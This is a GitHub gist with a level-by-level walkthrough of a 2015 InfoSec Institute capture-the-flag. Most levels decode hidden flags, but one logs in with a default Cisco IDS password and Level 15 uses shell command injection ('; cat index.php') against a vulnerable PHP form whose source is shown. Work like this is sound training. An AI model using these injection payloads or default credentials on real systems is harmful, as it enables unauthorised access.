Skip to content

Instantly share code, notes, and snippets.

@haykuro
Last active Aug 14, 2021
Embed
What would you like to do?
http://ctf.infosecinstitute.com/
## Level 1:
View the source, at the top we see:
<!-- infosec_flagis_welcome -->
Level 1 PASS: infosec_flagis_welcome
## Level 2:
We have a broken image at: http://ctf.infosecinstitute.com/img/leveltwo.jpeg
$ curl -s http://ctf.infosecinstitute.com/img/leveltwo.jpeg
aW5mb3NlY19mbGFnaXNfd2VhcmVqdXN0c3RhcnRpbmc=
$ curl -s http://ctf.infosecinstitute.com/img/leveltwo.jpeg | base64 -D
infosec_flagis_wearejuststarting
Level 2 PASS: infosec_flagis_wearejuststarting
====
## Level 3:
We decode the QR code using an online service:
http://zxing.org/w/decode?u=http%3A%2F%2Fctf.infosecinstitute.com%2Fimg%2Fqrcode.png
Output:
.. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... .. -. --.
This looks like morse code.
We resolve it to: INFOSECFLAGISMORSING
Level 3 PASS: INFOSECFLAGISMORSING
## Level 4:
We land on the page and see cookie monster tell us HTTP stands for "Hyper Text Transfer Protocol."
Well, part of the protocol is cookie monster's favorite: COOKIES!
We see:
$ GET http://ctf.infosecinstitute.com/levelfour.php
GET /levelfour.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: ctf.infosecinstitute.com
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 1235
Content-Type: text/html
Date: Thu, 12 Mar 2015 21:42:25 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: fusrodah=vasbfrp_syntvf_jrybirpbbxvrf
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.6
fusrodah is a reference to a DBZ meme, look it up.
The text "vasbfrp_syntvf_jrybirpbbxvrf" is the password crypted using rot13.
Level 4 PASS: infosec_flagis_welovecookies
===
Level 5:
There's an infinite loop forcing an alert box that reads "hacker."
Most modern browsers will allow you to "prevent further pop-ups", but alternatively you can download the page using an external tool (such as wget or curl)
$ wget -o levelfive.html http://ctf.infosecinstitute.com/levelfive.php
ANOTHER option is to type into your browser: "view-source:http://ctf.infosecinstitute.com/levelfive.php" and you should see the source.
We see:
<script>
for(;;){
alert('Hacker!!!');
}
</script>
<img src="img/aliens.jpg" /> <br /> <br />
I tried to run "strings" on the image but nothing significant came up..
$ curl -s http://ctf.infosecinstitute.com/img/aliens.jpg | strings | head -n 512
JFIF
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
}/p2
E(5mN
>0x:
k0h^,
5}.-V
W'k]
3Meo4
vq]i
_MkIti
pFON95
Ul3D
ko0nE
...
So, we can run a Steg tool like "Steghide" (https://futureboy.us/stegano/decinput.html) to try to see if there's any readily available text in the file.
We get back:
01101001011011100110011001101111011100110110010101100011010111110110011001101100011000010110011101101001011100110101111101110011011101000110010101100111011000010110110001101001011001010110111001110011
$ perl -e '$bin="01101001011011100110011001101111011100110110010101100011010111110110011001101100011000010110011101101001011100110101111101110011011101000110010101100111011000010110110001101001011001010110111001110011"; $len=length($bin); print pack("B$len", $bin);'
infosec_flagis_stegaliens
Level 5 PASS: infosec_flagis_stegaliens
===
Level 6:
We download sharkfin.pcap.
$ tcpdump -qns 0 -X -r sharkfin.pcap | head
reading from file sharkfin.pcap, link-type EN10MB (Ethernet)
14:59:54.303760 IP 127.0.0.1.32769 > 127.0.0.1.139: UDP, length 44
0x0000: 4500 0048 0000 4000 4011 3ca3 7f00 0001 E..H..@.@.<.....
0x0010: 7f00 0001 8001 008b 0034 0000 3639 3665 .........4..696e
0x0020: 3636 3666 3733 3635 3633 3566 3636 3663 666f7365635f666c
0x0030: 3631 3637 3639 3733 3566 3733 3665 3639 616769735f736e69
0x0040: 3636 3636 3635 3634 66666564
15:10:33.563340 IP 192.168.1.103.2925 > 133.242.147.91.80: tcp 0
0x0000: 4500 0028 1acb 4000 8006 04a8 c0a8 0167 E..(..@........g
0x0010: 85f2 935b 0b6d 0050 bbf2 588c 6f42 6144 ...[.m.P..X.oBaD
0x0020: 5011 1006 d3ad 0000 P.......
Quickly browsing around I notice,
696e666f7365635f666c616769735f736e6966666564 is hex encoded: infosec_flagis_sniffed
Level 6 PASS: infosec_flagis_sniffed
===
Level 7:
$ curl --HEAD http://ctf.infosecinstitute.com/404.php
HTTP/1.0 404 Not Found
Date: Thu, 12 Mar 2015 22:03:58 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.6
Connection: close
Content-Type: text/html
$ curl --HEAD http://ctf.infosecinstitute.com/levelseven.php
HTTP/1.0 200 aW5mb3NlY19mbGFnaXNfeW91Zm91bmRpdA==
Date: Thu, 12 Mar 2015 22:04:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.6
Connection: close
Content-Type: text/html
$ echo -n "aW5mb3NlY19mbGFnaXNfeW91Zm91bmRpdA==" | base64 -D
infosec_flagis_youfoundit
Level 7 PASS: infosec_flagis_youfoundit
===
Level 8:
Because I'm on a Mac I solved this first without even opening the app:
$ strings app.exe| ack -i infosec_flag
infosec_flagis_0x1a
BUT, to do what's right, I booted a virtual machine to debug the app and make sure!
See Dump here: http://i.imgur.com/CcqudvC.png
Level 8 PASS: infosec_flagis_0x1a
===
Level 9:
We load the page and see a "CISCO IDS Login"
Look up default logins for any CISCO IDS router, we see: "root/attack"
Type it in, we get an alert "ssaptluafed_sigalf_cesofni"
$ echo -n "ssaptluafed_sigalf_cesofni" | rev
infosec_flagis_defaultpass
Level 9 PASS: infosec_flagis_defaultpass
===
Level 11:
$ curl -s http://ctf.infosecinstitute.com/img/php-logo-virus.jpg | strings | grep infosec_flag
infosec_flagis_aHR0cDovL3d3dy5yb2xsZXJza2kuY28udWsvaW1hZ2VzYi9wb3dlcnNsaWRlX2xvZ29fbGFyZ2UuZ2lm
Level 11 PASS: infosec_flagis_http://www.rollerski.co.uk/imagesb/powerslide_logo_large.gif
===
Level 12:
View source, we see "http://ctf.infosecinstitute.com/css/design.css" is being imported now.
$ curl -s http://ctf.infosecinstitute.com/css/design.css
.thisloveis{
color: #696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72;
}
696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72 is hex for infosec_flagis_heyimnotacolor
Level 12 PASS: infosec_flagis_heyimnotacolor
===
Level 13:
After fuzzing the URL we find: http://ctf.infosecinstitute.com/levelthirteen.php.old
This file contains:
<?php
/* <img src="img/clippy1.jpg" class="imahe" /> <br /> <br />
<p>Do you want to download this mysterious file?</p>
<a href="misc/imadecoy">
<button class="btn">Yes</button>
</a>
<a href="index.php">
<button class="btn">No</button>
</a>
*/
?>
</div>
So, we get the file and check it..
$ wget http://ctf.infosecinstitute.com/misc/imadecoy
..
$ file imadecoy
imadecoy: tcpdump capture file (little-endian) - version 2.4 (Linux "cooked", capture length 65535)
So let's open the dump in Wireshark.
We see a user requests a file "/honeypy/img/HoneyPY.PNG"
View / Dump the image, and we get a png: "infosec_flagis_morepackets"
===
Level 14:
We download a file, http://ctf.infosecinstitute.com/misc/level14.
The file contains SQL data.
We notice a table "flag?" which has some hashed password.
Attempted to crack using JTR (John the Ripper) to no avail.
Check other tables and find significant value "\u0069\u006e\u0066\u006f\u0073\u0065\u0063\u005f\u0066\u006c\u0061\u0067\u0069\u0073\u005f\u0077\u0068\u0061\u0074\u0073\u006f\u0072\u0063\u0065\u0072\u0079\u0069\u0073\u0074\u0068\u0069\u0073" under "name" column in "friends" table.
Replace \u00 with \x and parse..
\x69\x6e\x66\x6f\x73\x65\x63\x5f\x66\x6c\x61\x67\x69\x73\x5f\x77\x68\x61\x74\x73\x6f\x72\x63\x65\x72\x79\x69\x73\x74\x68\x69\x73
Then pass through:
$ python -c 'print "\x69\x6e\x66\x6f\x73\x65\x63\x5f\x66\x6c\x61\x67\x69\x73\x5f\x77\x68\x61\x74\x73\x6f\x72\x63\x65\x72\x79\x69\x73\x74\x68\x69\x73"'
infosec_flagis_whatsorceryisthis
Level 14 PASS: infosec_flagis_whatsorceryisthis
===
Level 15:
http://ctf.infosecinstitute.com/levelfifteen/index.php
If we enter "; <cmd>" we can execute multiple commands.
Example:
; cat index.php
This gives us the source of index.php, where we see:
<?php
if(isset($_POST['dig'])){
echo "<pre>";
$cmd = ($_POST['dig']);
system("dig mx " . $cmd );
echo "</pre>";
die;
}
?>
GREAT!
now if we do:
; ls -lah
we see:
total 16K
drwxrwxr-x 2 ubuntu ubuntu 4.0K Mar 3 18:50 .
drwxr-xr-x 7 ubuntu ubuntu 4.0K Mar 4 22:14 ..
-rw-rw-r-- 1 ubuntu ubuntu 37 Mar 6 20:27 .hey
-rw-rw-r-- 1 ubuntu ubuntu 3.8K Mar 6 20:27 index.php
so we do:
; cat .hey
we get:
Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC
We can decrypt this hash using an ATOM-128 Decypter tool found here: http://crypto.x-usenext.net/eng_atom128d.php
We get: infosec_flagis_rceatomized
[.. TODO: FINISH Level 10! ..]
@Eileenioi
Copy link

Eileenioi commented Aug 14, 2021

CDEFGHIJSTUVWXYZcdefghijstuvwxyzC����������������������������

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment